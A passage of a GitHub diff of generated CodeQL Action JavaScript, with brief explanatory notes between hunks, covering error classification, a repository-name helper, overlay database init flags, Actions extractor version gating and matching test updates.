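    throw new Error(`${name} environment variable must be set`);
  }
  return value;
}

// Field names match the call sites above (repositoryNwo.owner / .repo).
function getRepositoryNwo(): RepositoryNwo {
  const [owner, repo] = getRequiredEnvParam("GITHUB_REPOSITORY").split("/");
  return { owner, repo };
}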
36 lib/api-client.test.js generated
@@ -120,4 +120,40 @@ function mockGetMetaVersionHeader(versionHeader) {
     });
     t.deepEqual({ type: util.GitHubVariant.GHE_DOTCOM }, gheDotcom);
 });
+(0, ava_1.default)("wrapApiConfigurationError correctly wraps specific configuration errors", (t) => {
+    // We don't reclassify arbitrary errors
+    const arbitraryError = new Error("arbitrary error");
+    let res = api.wrapApiConfigurationError(arbitraryError);
+    t.is(res, arbitraryError);
+    // Same goes for arbitrary errors
+    const configError = new util.ConfigurationError("arbitrary error");
+    res = api.wrapApiConfigurationError(configError);
+    t.is(res, configError);
+    // If an HTTP error doesn't contain a specific error message, we don't
+    // wrap is an an API error.
+    const httpError = new util.HTTPError("arbitrary HTTP error", 456);
+    res = api.wrapApiConfigurationError(httpError);
+    t.is(res, httpError);
+    // For other HTTP errors, we wrap them as Configuration errors if they contain
+    // specific error messages.
+    const httpNotFoundError = new util.HTTPError("commit not found", 404);
+    res = api.wrapApiConfigurationError(httpNotFoundError);
+    t.deepEqual(res, new util.ConfigurationError("commit not found"));
+    const refNotFoundError = new util.HTTPError("ref 'refs/heads/jitsi' not found in this repository - https://docs.github.com/rest", 404);
+    res = api.wrapApiConfigurationError(refNotFoundError);
+    t.deepEqual(res, new util.ConfigurationError("ref 'refs/heads/jitsi' not found in this repository - https://docs.github.com/rest"));
+    const apiRateLimitError = new util.HTTPError("API rate limit exceeded for installation", 403);
+    res = api.wrapApiConfigurationError(apiRateLimitError);
+    t.deepEqual(res, new util.ConfigurationError("API rate limit exceeded for installation"));
+    const tokenSuggestionMessage = "Please check that your token is valid and has the required permissions: contents: read, security-events: write";
+    const badCredentialsError = new util.HTTPError("Bad credentials", 401);
+    res = api.wrapApiConfigurationError(badCredentialsError);
+    t.deepEqual(res, new util.ConfigurationError(tokenSuggestionMessage));
+    const notFoundError = new util.HTTPError("Not Found", 404);
+    res = api.wrapApiConfigurationError(notFoundError);
+    t.deepEqual(res, new util.ConfigurationError(tokenSuggestionMessage));
+    const resourceNotAccessibleError = new util.HTTPError("Resource not accessible by integration", 403);
+    res = api.wrapApiConfigurationError(resourceNotAccessibleError);
+    t.deepEqual(res, new util.ConfigurationError("Resource not accessible by integration"));
+});
 //# sourceMappingURL=api-client.test.js.map
File diff suppressed because one or more lines are too long
@@ -1 +1 @@
-{ "maximumVersion": "3.16", "minimumVersion": "3.12" }
+{ "maximumVersion": "3.17", "minimumVersion": "3.12" }
2
lib/autobuild.js
generated
2
lib/autobuild.js
generated
@@ -123,7 +123,7 @@ async function setupCppAutobuild(codeql, logger) {
     const envVar = feature_flags_1.featureConfig[feature_flags_1.Feature.CppDependencyInstallation].envVar;
     const featureName = "C++ automatic installation of dependencies";
     const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
-    const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
+    const repositoryNwo = (0, repository_1.getRepositoryNwo)();
     const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
     if (await features.getValue(feature_flags_1.Feature.CppDependencyInstallation, codeql)) {
         // disable autoinstall on self-hosted runners unless explicitly requested
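
The change above replaces the inline `parseRepositoryNwo(getRequiredEnvParam("GITHUB_REPOSITORY"))` pattern with a single `getRepositoryNwo()` call. A sketch of what such a helper plausibly wraps, assuming the same two utilities it replaces:

// Hypothetical shape of the new helper in ./repository; it centralizes the
// environment lookup that each call site previously performed inline.
function getRepositoryNwo() {
    return parseRepositoryNwo(getRequiredEnvParam("GITHUB_REPOSITORY"));
}
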
@@ -1 +1 @@
{"version":3,"file":"autobuild.js","sourceRoot":"","sources":["../src/autobuild.ts"],"names":[],"mappings":"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"}
{"version":3,"file":"autobuild.js","sourceRoot":"","sources":["../src/autobuild.ts"],"names":[],"mappings":"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"}
4  lib/cli-errors.js  generated
@@ -110,6 +110,7 @@ function extractAutobuildErrors(error) {
 var CliConfigErrorCategory;
 (function (CliConfigErrorCategory) {
     CliConfigErrorCategory["AutobuildError"] = "AutobuildError";
+    CliConfigErrorCategory["CouldNotCreateTempDir"] = "CouldNotCreateTempDir";
     CliConfigErrorCategory["ExternalRepositoryCloneFailed"] = "ExternalRepositoryCloneFailed";
     CliConfigErrorCategory["GradleBuildFailed"] = "GradleBuildFailed";
     CliConfigErrorCategory["IncompatibleWithActionVersion"] = "IncompatibleWithActionVersion";
@@ -139,6 +140,9 @@ exports.cliErrorsConfig = {
             new RegExp("We were unable to automatically build your code"),
         ],
     },
+    [CliConfigErrorCategory.CouldNotCreateTempDir]: {
+        cliErrorMessageCandidates: [new RegExp("Could not create temp directory")],
+    },
     [CliConfigErrorCategory.ExternalRepositoryCloneFailed]: {
         cliErrorMessageCandidates: [
             new RegExp("Failed to clone external Git repository"),
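
The new CouldNotCreateTempDir entry follows the existing pattern: each category lists regexes that are matched against the CLI's error output, and a hit reclassifies the failure as user-actionable. A sketch of how such a table is typically consumed (the matcher name and shape are illustrative, not the module's actual internals):

// Illustrative matcher over the cliErrorsConfig table shown above.
function findCategory(cliErrorMessage) {
    for (const [category, config] of Object.entries(cliErrorsConfig)) {
        if (config.cliErrorMessageCandidates.some((re) => re.test(cliErrorMessage))) {
            return category; // e.g. "CouldNotCreateTempDir"
        }
    }
    return undefined; // unmatched errors remain internal errors
}
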
File diff suppressed because one or more lines are too long
45  lib/codeql.js  generated
@@ -55,6 +55,7 @@ const environment_1 = require("./environment");
 const feature_flags_1 = require("./feature-flags");
 const git_utils_1 = require("./git-utils");
 const languages_1 = require("./languages");
+const overlay_database_utils_1 = require("./overlay-database-utils");
 const setupCodeql = __importStar(require("./setup-codeql"));
 const tools_features_1 = require("./tools-features");
 const tracer_config_1 = require("./tracer-config");
@@ -133,7 +134,11 @@ async function setupCodeQL(toolsInput, apiDetails, tempDir, variant, defaultCliV
         };
     }
     catch (e) {
-        throw new Error(`Unable to download and extract CodeQL CLI: ${(0, util_1.getErrorMessage)(e)}${e instanceof Error && e.stack ? `\n\nDetails: ${e.stack}` : ""}`);
+        const ErrorClass = e instanceof util.ConfigurationError ||
+            (e instanceof Error && e.message.includes("ENOSPC")) // out of disk space
+            ? util.ConfigurationError
+            : Error;
+        throw new ErrorClass(`Unable to download and extract CodeQL CLI: ${(0, util_1.getErrorMessage)(e)}${e instanceof Error && e.stack ? `\n\nDetails: ${e.stack}` : ""}`);
     }
 }
 /**
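
The catch block now routes disk-exhaustion failures (ENOSPC) and already-classified configuration errors to util.ConfigurationError, so they surface as user-actionable rather than internal errors, while keeping the same message. A compact sketch of the underlying pattern (the helper name is hypothetical):

// Hypothetical helper distilling the "choose an error class, keep the message" pattern above.
function rethrowClassified(e, isUserActionable, message) {
    const ErrorClass = isUserActionable(e) ? util.ConfigurationError : Error;
    throw new ErrorClass(message);
}

// Usage mirroring the hunk: ENOSPC (out of disk space) counts as user-actionable.
// rethrowClassified(e,
//     (err) => err instanceof Error && err.message.includes("ENOSPC"),
//     `Unable to download and extract CodeQL CLI: ${(0, util_1.getErrorMessage)(e)}`);
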
@@ -250,7 +255,7 @@ async function getCodeQLForCmd(cmd, checkVersion) {
     async supportsFeature(feature) {
         return (0, tools_features_1.isSupportedToolsFeature)(await this.getVersion(), feature);
     },
-    async databaseInitCluster(config, sourceRoot, processName, qlconfigFile, logger) {
+    async databaseInitCluster(config, sourceRoot, processName, qlconfigFile, overlayDatabaseMode, logger) {
         const extraArgs = config.languages.map((language) => `--language=${language}`);
         if (await (0, tracer_config_1.shouldEnableIndirectTracing)(codeql, config)) {
             extraArgs.push("--begin-tracing");
@@ -258,9 +263,17 @@ async function getCodeQLForCmd(cmd, checkVersion) {
             extraArgs.push(`--trace-process-name=${processName}`);
         }
         if (config.languages.indexOf(languages_1.Language.actions) >= 0) {
-            extraArgs.push("--search-path");
-            const extractorPath = path.resolve(__dirname, "../actions-extractor");
-            extraArgs.push(extractorPath);
+            // We originally added an embedded version of the Actions extractor to the CodeQL Action
+            // itself in order to deploy the extractor between CodeQL releases. When we did add the
+            // extractor to the CLI, though, its autobuild script was missing the execute bit.
+            // 2.20.6 is the first CLI release with the fully-functional extractor in the CLI. For older
+            // versions, we'll keep using the embedded extractor. We can remove the embedded extractor
+            // once 2.20.6 is deployed in the runner images.
+            if (!(await util.codeQlVersionAtLeast(codeql, "2.20.6"))) {
+                extraArgs.push("--search-path");
+                const extractorPath = path.resolve(__dirname, "../actions-extractor");
+                extraArgs.push(extractorPath);
+            }
         }
         const codeScanningConfigFile = await generateCodeScanningConfig(config, logger);
         const externalRepositoryToken = (0, actions_util_1.getOptionalInput)("external-repository-token");
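
The embedded Actions extractor is now injected only for CLI versions older than 2.20.6, the first release whose bundled extractor works out of the box. `codeQlVersionAtLeast` amounts to a semver comparison against the CLI's reported version; a sketch of the gating idea, assuming a getVersion() that resolves to an object with a semver `version` string:

const semver = require("semver");

// Sketch: true if the resolved CLI is at least the given version.
async function codeQlVersionAtLeast(codeql, requiredVersion) {
    const { version } = await codeql.getVersion();
    return semver.gte(version, requiredVersion);
}
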
@@ -278,10 +291,19 @@ async function getCodeQLForCmd(cmd, checkVersion) {
         const overwriteFlag = (0, tools_features_1.isSupportedToolsFeature)(await this.getVersion(), tools_features_1.ToolsFeature.ForceOverwrite)
             ? "--force-overwrite"
             : "--overwrite";
+        if (overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.Overlay) {
+            const overlayChangesFile = await (0, overlay_database_utils_1.writeOverlayChangesFile)(config, sourceRoot, logger);
+            extraArgs.push(`--overlay-changes=${overlayChangesFile}`);
+        }
+        else if (overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.OverlayBase) {
+            extraArgs.push("--overlay-base");
+        }
         await runCli(cmd, [
             "database",
             "init",
-            overwriteFlag,
+            ...(overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.Overlay
+                ? []
+                : [overwriteFlag]),
             "--db-cluster",
             config.dbLocation,
             `--source-root=${sourceRoot}`,
@@ -293,6 +315,9 @@ async function getCodeQLForCmd(cmd, checkVersion) {
                 ignoringOptions: ["--overwrite"],
             }),
         ], { stdin: externalRepositoryToken });
+        if (overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.OverlayBase) {
+            await (0, overlay_database_utils_1.writeBaseDatabaseOidsFile)(config, sourceRoot);
+        }
     },
     async runAutobuild(config, language) {
         applyAutobuildAzurePipelinesTimeoutFix();
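
Taken together, the hunks above thread a new overlayDatabaseMode parameter through database init: Overlay runs pass --overlay-changes (and drop the overwrite flag), OverlayBase runs pass --overlay-base and record the base database OIDs afterwards, and None leaves the arguments untouched. The mapping in isolation, as an illustrative distillation rather than the module's actual code:

// Illustrative: the flag selection implied by the overlay handling above.
function overlayExtraArgs(mode, overlayChangesFile) {
    switch (mode) {
        case OverlayDatabaseMode.Overlay:
            return [`--overlay-changes=${overlayChangesFile}`];
        case OverlayDatabaseMode.OverlayBase:
            return ["--overlay-base"];
        default:
            return []; // OverlayDatabaseMode.None
    }
}
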
@@ -446,7 +471,6 @@ async function getCodeQLForCmd(cmd, checkVersion) {
         "run-queries",
         ...flags,
         databasePath,
-        "--expect-discarded-cache",
         "--intra-layer-parallelism",
         "--min-disk-free=1024", // Try to leave at least 1GB free
         "-v",
@@ -785,6 +809,13 @@ async function generateCodeScanningConfig(config, logger) {
     if (Array.isArray(augmentedConfig.packs) && !augmentedConfig.packs.length) {
         delete augmentedConfig.packs;
     }
+    augmentedConfig["query-filters"] = [
+        ...(config.augmentationProperties.defaultQueryFilters || []),
+        ...(augmentedConfig["query-filters"] || []),
+    ];
+    if (augmentedConfig["query-filters"]?.length === 0) {
+        delete augmentedConfig["query-filters"];
+    }
     logger.info(`Writing augmented user configuration file to ${codeScanningConfigFile}`);
     logger.startGroup("Augmented user configuration file contents");
     logger.info(yaml.dump(augmentedConfig));
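
The generated code-scanning config now prepends action-computed default filters (currently just the diff-informed exclude-from-incremental filter) to any user-supplied query-filters, then drops the key entirely when the merged list is empty so the emitted YAML stays minimal. The merge in isolation, with hypothetical variable names:

// Illustrative: the merge behavior of the hunk above.
const merged = [
    ...(defaultQueryFilters || []),          // e.g. [{ exclude: { tags: "exclude-from-incremental" } }]
    ...(userConfig["query-filters"] || []),  // whatever the user configured
];
if (merged.length > 0) {
    userConfig["query-filters"] = merged;
}
else {
    delete userConfig["query-filters"];
}
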
File diff suppressed because one or more lines are too long
11  lib/codeql.test.js  generated
@@ -53,6 +53,7 @@ const defaults = __importStar(require("./defaults.json"));
 const doc_url_1 = require("./doc-url");
 const languages_1 = require("./languages");
 const logging_1 = require("./logging");
+const overlay_database_utils_1 = require("./overlay-database-utils");
 const setup_codeql_1 = require("./setup-codeql");
 const testing_utils_1 = require("./testing-utils");
 const tools_features_1 = require("./tools-features");
@@ -335,7 +336,7 @@ const injectedConfigMacro = ava_1.default.macro({
         tempDir,
         augmentationProperties,
     };
-    await codeqlObject.databaseInitCluster(thisStubConfig, "", undefined, undefined, (0, logging_1.getRunnerLogger)(true));
+    await codeqlObject.databaseInitCluster(thisStubConfig, "", undefined, undefined, overlay_database_utils_1.OverlayDatabaseMode.None, (0, logging_1.getRunnerLogger)(true));
     const args = runnerConstructorStub.firstCall.args[1];
     // should have used an config file
     const configArg = args.find((arg) => arg.startsWith("--codescanning-config="));
@@ -471,7 +472,7 @@ const injectedConfigMacro = ava_1.default.macro({
     const runnerConstructorStub = stubToolRunnerConstructor();
     const codeqlObject = await codeql.getCodeQLForTesting();
     sinon.stub(codeqlObject, "getVersion").resolves((0, testing_utils_1.makeVersionInfo)("2.17.6"));
-    await codeqlObject.databaseInitCluster({ ...stubConfig, tempDir }, "", undefined, "/path/to/qlconfig.yml", (0, logging_1.getRunnerLogger)(true));
+    await codeqlObject.databaseInitCluster({ ...stubConfig, tempDir }, "", undefined, "/path/to/qlconfig.yml", overlay_database_utils_1.OverlayDatabaseMode.None, (0, logging_1.getRunnerLogger)(true));
     const args = runnerConstructorStub.firstCall.args[1];
     // should have used a config file
     const hasCodeScanningConfigArg = args.some((arg) => arg.startsWith("--codescanning-config="));
@@ -487,7 +488,7 @@ const injectedConfigMacro = ava_1.default.macro({
     const codeqlObject = await codeql.getCodeQLForTesting();
     sinon.stub(codeqlObject, "getVersion").resolves((0, testing_utils_1.makeVersionInfo)("2.17.6"));
     await codeqlObject.databaseInitCluster({ ...stubConfig, tempDir }, "", undefined, undefined, // undefined qlconfigFile
-    (0, logging_1.getRunnerLogger)(true));
+    overlay_database_utils_1.OverlayDatabaseMode.None, (0, logging_1.getRunnerLogger)(true));
     const args = runnerConstructorStub.firstCall.args[1];
     const hasQlconfigArg = args.some((arg) => arg.startsWith("--qlconfig-file="));
     t.false(hasQlconfigArg, "should NOT have injected a qlconfig");
@@ -612,7 +613,7 @@ for (const { codeqlVersion, flagPassed, githubVersion, negativeFlagPassed, } of
     sinon.stub(io, "which").resolves("");
     await t.throwsAsync(async () => await codeqlObject.databaseRunQueries(stubConfig.dbLocation, []), {
         instanceOf: cli_errors_1.CliError,
-        message: `Encountered a fatal error while running "codeql-for-testing database run-queries --expect-discarded-cache --intra-layer-parallelism --min-disk-free=1024 -v". Exit code was 1 and error was: Oops! A fatal internal error occurred. Details:
+        message: `Encountered a fatal error while running "codeql-for-testing database run-queries --intra-layer-parallelism --min-disk-free=1024 -v". Exit code was 1 and error was: Oops! A fatal internal error occurred. Details:
 com.semmle.util.exception.CatastrophicError: An error occurred while evaluating ControlFlowGraph::ControlFlow::Root.isRootOf/1#dispred#f610e6ed/2@86282cc8
 Severe disk cache trouble (corruption or out of space) at /home/runner/work/_temp/codeql_databases/go/db-go/default/cache/pages/28/33.pack: Failed to write item to disk. See the logs for more details.`,
     });
@@ -638,7 +639,7 @@ for (const { codeqlVersion, flagPassed, githubVersion, negativeFlagPassed, } of
